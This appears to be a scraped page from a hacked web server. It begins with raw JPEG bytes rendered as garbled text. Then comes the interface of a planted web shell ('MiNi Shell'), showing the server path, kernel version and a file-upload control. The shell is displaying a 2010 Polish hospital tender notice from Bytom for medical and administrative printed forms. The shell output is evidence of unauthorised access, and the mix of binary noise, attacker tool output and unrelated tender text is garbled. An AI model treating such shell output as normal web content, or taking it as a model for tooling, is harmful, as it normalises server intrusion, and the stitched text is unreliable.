JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100621/160687-N-2010.html

<p class="kh_header"><b>Bytom: Przetarg nieograniczony na dostawę druków medycznych i administracyjnych dla potrzeb Szpitala Specjalistycznego Nr 2 w Bytomiu.</b><br>
<b>Numer ogłoszenia: 160687 - 2010; data zamieszczenia: 21.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny Nr 2 , ul. Stefana Batorego 15, 41-902 Bytom, woj. śląskie, tel. 032 7861400, faks 032 7861646.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.szpital2.bytom.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawę druków medycznych i administracyjnych dla potrzeb Szpitala Specjalistycznego Nr 2 w Bytomiu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w przetargu nieograniczonym jest dostawa druków medycznych i administracyjnych dla potrzeb Szpitala Specjalistycznego Nr 2 w Bytomiu określonych  przez Zamawiającego według grup asortymentowo - cenowych zgrupowanych w Pakietach  nr 1 - 8   stanowiących załącznik A do specyfikacji istotnych warunków zamówienia:
Pakiet nr 1 - DRUKI I   -  Druki medyczne I
Pakiet nr 2 - DRUKI II  -  Księgi, książki medyczne
Pakiet nr 3 - DRUKI III -  Druki laboratoryjne
Pakiet nr 4 - DRUKI IV - Druki medyczne II
Pakiet nr 5 - DRUKI V  - Druki administracyjne 
Pakiet nr 6 - DRUKI VI - Recepty
Pakiet nr 7 - DRUKI VII - Druki do sterylizacji sprzętu Medycznego
Pakiet nr 8 - DRUKI VIII - Druki medyczne III.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.96.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od wykonawcy wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy posiadania uprawnień do  wykonywania określonej działalności  lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania (art. 22 ust 1 pkt 1 pzp ), tj.: 
są uprawnieni do występowania w obrocie prawnym i prowadzą działalność w zakresie objętym niniejszym zamówieniem - Wykonawca składa oświadczenie oraz dokumenty określone w § 18 ust. 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia (art. 22 ust 1 pkt 2 pzp). tj.: zapewnią termin dostawy oferowanego przedmiotu zamówienia: 5 dni - Wykonawca składa oświadczenie dotyczące terminu dostawy będące załącznikiem nr 5 do SIWZ oraz w ramach pakietu nr 6 oświadczenie będące załącznikiem nr 7 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia Zamawiający wymaga oświadczenia dotyczącego terminu dostawy wg wzoru stanowiącego załącznik nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie podlegają wykluczeniu na podstawie art. 24 pzp - Wykonawca składa dokumenty określone w § 18 ust. 1 SIWZ oraz oświadczenie będące załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Zamawiający wymaga oświadczenia o stałości cen oraz warunkach płatności wg wzoru stanowiącego załącznik nr 4 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wypełniony załącznik nr 2 do SIWZ wraz z załączonym formularzem asortymentowo - cenowym ( stanowiącym załącznik A do SIWZ)</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalspec2.bytom.ids.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny numer 2 w Bytomiu ul. Stefana Batorego 15 , 41 - 902 Bytom ( pokoj numer 18 , I pietro , Zamówienia Publiczne , Bud. Dyrekcji ) lub bezpłatnie ze strony internetowej szpitala..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.07.2010 godzina 09:00, miejsce: Szpital Specjalistyczny numer 2 w Bytomiu ul. Stefana Batorego 15 , 41 - 902 Bytom 
(pokój numer 2, parter, Kancelaria Główna, Bud. Dyrekcji )..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DRUKI I  Druki medyczne I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	409	Badanie USG prenatalne, format A4 jednostronny	500	szt
2	410	Dieta pęcherzykowa, format A4, dwustronny	500	szt
3	411	Karta dokumentu zabiegów operacyjnych, format A4, dwustronny	1500	szt
4	412	Karta - znieczulenie podpajęczynówkowe, format A6, jednostronny	45	bl
5	413	Karta cukrzycowa (poradnia), format A4, dwustronny	500	szt
6	414	Skierowanie na konsutacyjne badania serologiczne, format A4, jednostronny	20	bl
7	415	Zwrot krwii, format A4, jednostronny	12	bl
8	416	Zwrot materiału poprzetoczeniowego, format A6, jednostronny (1/2 A5)	18	bl
9	417	Karta obeserwacji pacjenta w trakcie przetaczania krwii i jej składników, format A4, jednostronny	3500	szt
10	418	Po zgodnej grupowo próbie krzyzowej i ujemnej próbie biologicznej przetoczono, format A5, dwustronny	3500	szt
11	419	Zamówienie imienne preparatu immunoglobuliny specyficznej gamma anty-D, format A4, dwustronny	1500	szt
12	420	Karta testów skórnych Allergopharma (metoda punktowa - wziewna) format A5, dwustronny	500	szt
13	421	Karta testów skórnych Allergopharma (metoda punktowa - pokarmowa), format A5, dwustronny	300	szt
14	422	Plan przyjmowania pacjentów - sala gimnastyczna, format A4, dwustronny	300	szt
15	423	Plan przyjmowania pacjentów - fizykoterapia, format A4, dwustronny	300	szt
16	424	Statystyka tygodniowa - sala gimnastyczna, format A4	300	szt
17	427	Informacja dla pacjentki - METODA CIĘCIA CESARSKIEGO, format A3, duwstronny, po złożeniu 3 str. A4	500	szt
18	428	Informacja dla pacjentki - WYCIĘCIA MACICY DROGĄ BRZUSZNĄ, format A3, duwstronny, po złożeniu 3 str. A4	200	szt
19	429	Informacja dla pacjentki - ZABURZEŃ STATYKI NARZĄDÓW PŁCIOWYCH DROGĄ POCHWOWĄ, format A3, duwstronny, po złożeniu 3 str. A4	200	szt
20	430	Informacja dla pacjentki - PRZY PODEJRZENIU NOWOTWORU ZŁOŚLIWEGO JAJNIKA, format A3, duwstronny, po złożeniu 4 str. A4	700	szt
21	431	Informacja dla pacjentki - PRZY PODEJRZENIU NOWOTWORU ZŁOŚLIWEGO MACICY, format A4, duwstronny	700	szt
22	432	Informacja dla pacjentki - WYŁYŻECZKOWANIA JAMY MACICY, format A3, dwustronny, po złożeniu 3 str. A4	800	szt
23	433	Informacja dla pacjentki - NIEZŁOŚLIWYCH ZMIAN CHOROBOWYCH SZYJKI MACICY, format A3, dwustronny, po złożeniu 3 str. A4	200	szt
24	434	Informacja dla pacjentki - GUZA (TORBIELI) JAJNIKA DROGĄ LAPAROTOMII, format A3, dwustronny, po złożeniu 3 str. A4	400	szt
25	435	Informacja dla pacjentki - MIĘŚNIAKÓW MACICY DROGĄ LAPAROTOMII, format A3, dwustronny, po złożeniu 3 str. A4	400	szt
24	436	Informacja dla pacjentki - (LAPAROSKOPIA, HISTEROSKOPIA), format A3, dwustronny, po złożeniu 3 str. A4	700	szt
25	440	Skierowanie do pracowni histopatologicznej, format A5, jednostronny	50	bl
26	441	Oświadczenie dotyczące uzyskania dokumentacji medycznej, format A5, jednostronny	100	bl
UWAGI:Cenę jednostkową netto należy podać za 100 szt, Bloczki - wymagane 100 kartek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.96.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DRUKI II Księgi, książki medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	66	Księga Działu Rehabilitacji w twardej okładce,  300 kartek - 600 stron, format pojedynczej strony A4, strony łączone w poziomie	7	szt 
2	71	Księga Pracowni Bakteriologicznej w twardej oprawie, zszywane, 200 kartek - 400 stron, format pojedynczej strony A4, strony łączone w poziomie	10	szt 
3	72	Księga Pracowni Endoskopowej w twardej okładce, 300 kartek - 600 stron, format pojedynczej strony A4, strony łaczone pionowo	2	szt 
4	73	Księga Pracowni EKG w twardej okładce, 300 kartek - 600 stron, format pojedynczej strony A4, strony łączone pionowo	6	szt
5	74	Księga Pracowni Histopatologicznej w grubej twardej okładce, 300 kartek - 600 stron, format pojedynczej strony A4, strony łączone pionowo	35	szt
6	76	Książka gabinetu zabiegowego w twardej okładce format A4	70	szt 
7	79	Książka operacyjna  A 4 w twardej okładce, 300 str - 150 kartek	25	szt 
8	79A	Książka operacyjna  format 2/3 A 4 w twardej okładce, 300 str - 150 kartek	2	szt
9	406	Księga chorych oddziału format A3, 300 kartek, twarda okładka (31x42,5)	12	szt
10	407	Ksiega główna przyjęć i wypisów format A3, 300 kartek, twarda okładka (31x42,5)	3	szt
11	77	Książka inwentarzowa / duża / w twardej okładce, 300 str - 150 kartek, format A3	3	szt 
12	78	Książka inwentarzowa w twardej okładce, 100 str - 50 kartek, format A4	10	szt 
13	401	Księga Szkoły Rodzenia Format A3 twarda oprawa zszywana po krótkim boku , 300- kartek	1	szt
14	217	Książka do rejestracji CPPMB.  Twarda okładka , format A4, 100 kartek	20	szt
15	220	Książka oczekujących pacjentów na udzielenie świadczeń. Twarda okładka, format A4, 100 kartek	5	szt
16	221	Księga badań pracowni USG,  twarda okładka , format A4, 150 kartek	15	szt
17	408	Książka badań laboratoryjnych, twarda okładka, format A4, 100 kartek	5	szt
18	222	Książka oddziałowa oddziału noworodków, twarda okładka, 400 str - 200 kartek, format szer 585mm x wys 297mm, format pojedynczej strony A4, strony łączone poziomo	3	szt
19	223	Książka porodowa, twarda okładka, format A4, 100 kartek	12	szt
20	207	Książka kontroli obrotu spirytusem i jego skażeniem, twarda okładka, firmowo przedziurkowana, 90 kartek druk akcydensowy	2	szt
21	254	Księga odmów przyjęć i porad ambulatoryjnych A4 300 kartek, twarda okładka	10	szt
22	254A	Księga odmów przyjęć i porad ambulatoryjnych A2 300 kartek, twarda okładka zszywana po środku	1	szt
23	364	Książka badania grupy krwi dla laboratoriów  wymiary szer - 30 cm wys. 31 cm, 100 kartek, twarda oprawa	5	szt
24	365	Książka próby zgodności dla laboratoriów wymiary szer - 30 cm wys. 31 cm, 100 kartek, twarda oprawa	3	szt
25	366	Książka Zakładu Radiologii Lekarskiej format A4, 300 kartek, twarda okładka, dwustronny	5	szt
26	80	Ksiega raportów pielegniarskich, format A4, 100 kartek	200	szt
27	437	Dziennik pracy stacji uzdatniania wody, format A4, 15 kartek, 30 stron	1	szt
28	438	Księga porad amulatoryjnych, format A4, 300 kartek, twarda oprawa	20	szt
29	438/a	Księga porad amulatoryjnych, format A4, 100 kartek, twarda oprawa	10	szt
30	438/b	Księga porad amulatoryjnych, format A4, 50 kartek, twarda oprawa	15	szt
31	439	Księga Pracowni Cytologicznej, format A4, 300 kartek, twarda oprawa	3	szt
UWAGI:Cenę jednostkową netto należy podać za 100 szt, Bloczki - wymagane 100 kartek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.96.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> DRUKI III Druki laboratoryjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	319	Wynik próby zgodności ( Pracowni serolobii transfuzjologicznej) wymiary szer 16,5 cm wys 15,5 cm jednostronne	20	bl
2	324	Wynik badania grupy krwi  wymiary szer 14,5 cm wys 10,5 cm  jednostronne	110	bl
3	327	IgG.  IgA.  IgM, format A5, jednostronny	10	bl
4	328	Test immunoenzymatyczny na obecnośc antygenu Gardia intestinalis w kale ( -) ujemny, jednostronny, format A5 	10	bl
5	329	Antygen CEA jednostronny, format A5	20	bl
6	330	Antygen CA125 ( test Elfa) dwustronny, format A5	22	bl
7	331	Antygen Rotawirusów, adenowirósów, format A5, jednostronny	20	bl
8	332	Antygen HCV ( - ) nieobecny, jednostronny, format A5	20	bl
9	333	Antygen HBs ( - ) nieobecny, jednostronny, format A5	120	bl
10	334	Antygen HBs przeciwciała przeciwkiłowe, jednostronny, format A5	100	bl
11	344	Wynik jednostronny format A5 z pieczątką nagłówkową Szpitala na papierze do drukarki LASEROWEJ	140	bl
12	347	Formularz zgłoszenia szczepienia do Sanepidu jednostronny A4	5	bl
13	372	TOXO IgG jednostronny, format A5	10	bl
14	373	TOXO IgM jednostronny  format A5	10	bl
15	404	Badnie mikologiczne, format A5, jednostronne 	10	bl
16	405	Badanie wydzieliny z pochwy - prep.bezp, format A5, jednostronne	5	bl
UWAGI:Cenę jednostkową netto należy podać za 100 szt, Bloczki - wymagane 100 kartek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.96.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> DRUKI IV  Druki medyczne II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	374	Karta ryzyka dwustronna - format A4	500	szt
2	7	Elektrokardiogram format A4 dwustronny	3300	szt
3	17	Historia choroby pacjenta leczonego w trybie jednodniowym format A4, 4 strony po złożeniu,( format pojedynczej strony A4, po złożeniu kompletny druk składa się z 2 kartek dwustronnie zadrukowanych czyli 4 str)	2100	szt
4	18	Historia choroby poradni, format A 5,  4 strony po złożeniu ( format pojedynczej strony A5, po złożeniu kompletny druk składa się z 2 kartek dwustronnie zadrukowanych czyli 4 str)	25000	szt
5	20	Indywidualna karta rejestracji drobnoustroju alarmowego / Załącznik nr 3/ format A4 jednostronny	500	szt
6	21	Indywidualna karta rejestracji zakażenia zakładowego / Załącznik nr.2 / format A4 dwustronny, druk koloru zielonego	1000	szt
7	22	Indywidualna karta zleceń lekarskich, format A4 poziomo, dwustronny	14000	szt
8	25	Informacja dla lekarza kierującego, format A5, jednostronny samokopiujący	340	bl
